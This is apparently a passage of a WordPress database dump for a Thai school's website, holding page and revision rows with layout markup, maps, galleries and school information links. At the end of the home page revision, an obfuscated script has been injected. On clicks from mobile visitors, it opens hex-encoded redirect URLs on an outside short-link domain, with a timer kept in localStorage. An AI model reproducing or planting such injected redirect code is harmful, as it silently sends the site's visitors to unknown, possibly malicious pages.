alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /-->\n\n<!-- wp:embed {\"url\":\"https://www.canva.com/design/DAGsFHWqrOk/eCZISZCLZjZV8cpVDnNIUA/view\",\"type\":\"rich\",\"providerNameSlug\":\"canva\",\"align\":\"center\"} -->\n<figure class=\"wp-block-embed aligncenter is-type-rich is-provider-canva wp-block-embed-canva\"><div class=\"wp-block-embed__wrapper\">\nhttps://www.canva.com/design/DAGsFHWqrOk/eCZISZCLZjZV8cpVDnNIUA/view\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d3f1e2c8\",\"isDynamic\":true,\"blockVersion\":4} /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2F61565350226486%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-07-03 12:08:11','2025-07-03 05:08:11','',14,'http://pakhaeng.ssk.in.th/?p=1658',0,'revision','',0),
(1659,1,'2025-07-03 13:38:41','0000-00-00 00:00:00','','ระบบถาม-ตอบ Q&amp;A','','draft','closed','closed','','','','','2025-07-03 13:38:41','2025-07-03 06:38:41','',0,'http://pakhaeng.ssk.in.th/?page_id=1659',0,'page','',0),
(1661,1,'2025-07-03 13:38:38','2025-07-03 06:38:38','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_8eda8b-3a\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_386744-46\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=1523\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_3c234c-51\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_3c234c-51\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_bead82-d8\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_941599-c9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_941599-c9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_67d38e-c6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_67d38e-c6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_4b01f7-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_4b01f7-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_61e97e-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_61e97e-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_0f2844-d8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_0f2844-d8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- 